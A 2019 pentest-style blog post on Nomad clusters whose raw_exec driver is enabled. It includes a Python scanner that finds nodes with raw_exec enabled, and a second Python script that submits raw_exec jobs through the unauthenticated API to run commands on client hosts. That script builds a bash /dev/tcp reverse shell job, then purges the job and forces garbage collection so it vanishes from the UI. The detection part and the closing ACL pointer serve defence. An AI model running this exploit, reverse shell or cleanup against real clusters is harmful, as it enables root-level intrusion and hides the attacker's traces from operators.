Monday, December 16, 2019

Devoops: Nomad with raw_exec enabled

"Nomad is a flexible container orchestration tool that enables an organization to easily deploy and manage any containerized or legacy application using a single, unified workflow. Nomad can run a diverse workload of Docker, non-containerized, microservice, and batch applications, and generally offers the following benefits to developers and operators..."


To get a feel for where it fits in the HashiCorp ecosystem, take a look at the following graphic:

I'd like to thank Will Butler for letting me write this up after watching him pwn it.

You can get a dev environment up and running using the tutorial here:

The walkthrough has you run it as a dev agent, which only binds to the loopback interface, so you'll need the following server and client config files to get a usable environment up and running after you vagrant up.


If you get everything up and running correctly you should be able to connect to the UI on port 4646 and, once you submit the example job (nomad job init writes example.nomad for you), see it there:

$ nomad job run example.nomad
==> Monitoring evaluation "ac9b4b08"
    Evaluation triggered by job "example"
    Evaluation within deployment: "8a7dfe0f"
    Allocation "57e65abe" created: node "a15034e5", group "cache"
    Evaluation status changed: "pending" -> "complete"

==> Evaluation "ac9b4b08" finished with status "complete"

jobs in the nomad UI

servers in the nomad UI

clients in the nomad UI

Now for the misconfiguration. Nomad ships with a raw_exec driver that is disabled by default.

The raw_exec driver runs a command with no isolation at all, directly on the Nomad client host, as whatever user the Nomad client process runs as (frequently root, since the other drivers want it).

"The raw_exec driver can run on all supported operating systems. For security reasons, it is disabled by default. To enable raw exec, the Nomad client configuration must explicitly enable the raw_exec driver in the client's options:"

How can you see whether the raw_exec driver is enabled on the clients?

You can check it in the UI (each client's detail page lists its drivers and their status):

or by hitting the API endpoint (GET /v1/node/<node id> returns the client's Attributes and Drivers maps; an enabled raw_exec shows up there as detected and healthy)
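As an added example (not from the original post), here is a Python script that does the API-side check: it lists the clients with GET /v1/nodes, fetches each one with GET /v1/node/<id>, and reports the nodes whose raw_exec driver is detected and healthy. The client-side setting it is looking for is driver.raw_exec.enable = "1" under the client options stanza (or enabled = true in a plugin "raw_exec" block on 0.9 and later). NOMAD_ADDR, the token handling and the sample node documents are constructed for the example; the first sample ID just reuses the node prefix from the job run output above.

```python
"""Find Nomad clients that have the raw_exec driver enabled.

Added example for this post, not code from Nomad or the post's author.
Uses the real endpoints GET /v1/nodes and GET /v1/node/<id>; NOMAD_ADDR
and SAMPLE_NODES are assumptions/constructed data for the example.
"""
import json
import os
import urllib.request

NOMAD_ADDR = os.environ.get("NOMAD_ADDR", "http://127.0.0.1:4646")  # assumption


def get_json(path, token=None):
    """GET a Nomad API path and parse the JSON body."""
    req = urllib.request.Request(NOMAD_ADDR + path)
    if token:  # only needed once ACLs are turned on
        req.add_header("X-Nomad-Token", token)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def raw_exec_enabled(node):
    """True if a node document reports raw_exec as detected and healthy.

    Nomad 0.9+ fingerprints drivers into node["Drivers"]; older clients only
    expose the attribute driver.raw_exec == "1", kept here as a fallback.
    """
    driver = node.get("Drivers", {}).get("raw_exec")
    if driver is not None:
        return bool(driver.get("Detected")) and bool(driver.get("Healthy"))
    return node.get("Attributes", {}).get("driver.raw_exec") == "1"


def find_raw_exec_nodes(nodes):
    """Names of the nodes (full node documents) with raw_exec available."""
    return [n["Name"] for n in nodes if raw_exec_enabled(n)]


def scan(token=None):
    """Live scan against NOMAD_ADDR: list nodes, fetch details, filter."""
    stubs = get_json("/v1/nodes", token)
    full = [get_json(f"/v1/node/{stub['ID']}", token) for stub in stubs]
    return find_raw_exec_nodes(full)


# Constructed sample documents shaped like GET /v1/node/<id> responses.
SAMPLE_NODES = [
    {"ID": "a15034e5-0000-4000-8000-000000000001", "Name": "nomad-client-1",
     "Attributes": {"driver.raw_exec": "1", "driver.docker": "1"},
     "Drivers": {"raw_exec": {"Detected": True, "Healthy": True},
                 "docker": {"Detected": True, "Healthy": True}}},
    {"ID": "b2c3d4e5-0000-4000-8000-000000000002", "Name": "nomad-client-2",
     "Attributes": {"driver.docker": "1"},
     "Drivers": {"raw_exec": {"Detected": False, "Healthy": False},
                 "docker": {"Detected": True, "Healthy": True}}},
    # pre-0.9 style node: no Drivers map, attribute only
    {"ID": "c3d4e5f6-0000-4000-8000-000000000003", "Name": "nomad-client-3",
     "Attributes": {"driver.raw_exec": "1"}},
]

if __name__ == "__main__":
    print("sample:", find_raw_exec_nodes(SAMPLE_NODES))
    print("live:", scan(os.environ.get("NOMAD_TOKEN")))
```

On an unauthenticated cluster (the default, no ACLs) the live scan needs no token; the same two endpoints are what the UI's client page is rendering.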

Let's exploit this thing.

We need to create a job HCL file with our commands. Here is a gist with a simple one:

starting the service

Results of our job

job in the UI

Stopping the job

forcefully run the garbage collection

validating the job was deleted

OK let's get a reverse shell. I used the following hcl file:

Reverse shell job

Shell from nomad
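The same sequence the post walks through (submit a raw_exec job, read its output, stop it, purge it and force a garbage collection so it no longer shows in the UI), plus the reverse shell variant, done through the HTTP API in Python. This is an added example, not the post's HCL gist; it uses the JSON job format that PUT /v1/jobs accepts instead of HCL. The routes are real Nomad endpoints (PUT /v1/jobs, GET /v1/job/<id>/allocations, GET /v1/client/fs/logs/<alloc>, DELETE /v1/job/<id>?purge=true, PUT /v1/system/gc, GET /v1/job/<id>). NOMAD_ADDR, the dc1 datacenter, the job IDs, the task resources and the listener host/port are assumptions.

```python
"""Run commands on a Nomad client via raw_exec over the HTTP API, then clean up.

Added example for this post (not the post's gist, not Nomad's code).
NOMAD_ADDR, DATACENTER, job IDs and the reverse shell listener are assumptions.
"""
import json
import os
import time
import urllib.error
import urllib.request

NOMAD_ADDR = os.environ.get("NOMAD_ADDR", "http://127.0.0.1:4646")  # assumption
DATACENTER = "dc1"                                                 # assumption


def api(method, path, body=None, token=None):
    """Minimal JSON client; returns None for empty bodies (PUT /v1/system/gc)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(NOMAD_ADDR + path, data=data, method=method)
    req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("X-Nomad-Token", token)
    with urllib.request.urlopen(req, timeout=15) as resp:
        raw = resp.read()
    return json.loads(raw) if raw else None


def build_raw_exec_job(job_id, command, args, datacenter=DATACENTER):
    """JSON job spec with one raw_exec task.

    Type "batch" runs the command once; a "service" job would be restarted
    by Nomad when the command exits, which matters for a shell that dies.
    """
    return {"Job": {
        "ID": job_id,
        "Name": job_id,
        "Type": "batch",
        "Datacenters": [datacenter],
        "TaskGroups": [{
            "Name": "raw",
            "Count": 1,
            "Tasks": [{
                "Name": "cmd",
                "Driver": "raw_exec",
                # executed on the client host, unisolated, as the Nomad user
                "Config": {"command": command, "args": list(args)},
                "Resources": {"CPU": 100, "MemoryMB": 64},
            }],
        }],
    }}


def recon_job(job_id="nomad-recon"):
    """Counterpart of the post's simple job: who and where are we running as."""
    return build_raw_exec_job(job_id, "/bin/sh", ["-c", "id; hostname; uname -a"])


def reverse_shell_job(lhost, lport, job_id="nomad-revshell"):
    """bash /dev/tcp reverse shell to a listener at lhost:lport (assumed)."""
    payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    return build_raw_exec_job(job_id, "/bin/bash", ["-c", payload])


def job_exists(job_id, token=None):
    """GET /v1/job/<id> answers 404 once the job has been purged."""
    try:
        api("GET", f"/v1/job/{job_id}", token=token)
        return True
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise


def task_stdout(job_id, task="cmd", token=None):
    """Read the first allocation's stdout via the client fs/logs endpoint."""
    allocs = api("GET", f"/v1/job/{job_id}/allocations", token=token) or []
    if not allocs:
        return ""
    url = (f"{NOMAD_ADDR}/v1/client/fs/logs/{allocs[0]['ID']}"
           f"?task={task}&type=stdout&plain=true")
    req = urllib.request.Request(url)
    if token:
        req.add_header("X-Nomad-Token", token)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


def cleanup(job_id, token=None):
    """Stop and purge the job, force GC, and report whether it is gone."""
    api("DELETE", f"/v1/job/{job_id}?purge=true", token=token)
    api("PUT", "/v1/system/gc", token=token)
    return not job_exists(job_id, token)


if __name__ == "__main__":
    token = os.environ.get("NOMAD_TOKEN")
    job = recon_job()
    api("PUT", "/v1/jobs", job, token)
    time.sleep(5)                      # give the batch task time to finish
    print(task_stdout(job["Job"]["ID"], token=token))
    print("purged:", cleanup(job["Job"]["ID"], token))
```

A plain nomad job stop leaves the job visible as dead until garbage collection runs, which is why the post follows it with a forced GC; purge=true on the DELETE (the API form of nomad job stop -purge) plus PUT /v1/system/gc is what makes it drop out of the UI. The allocation directory and any logs stay on the client until its own GC removes them.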


Info on locking nomad down via ACLs: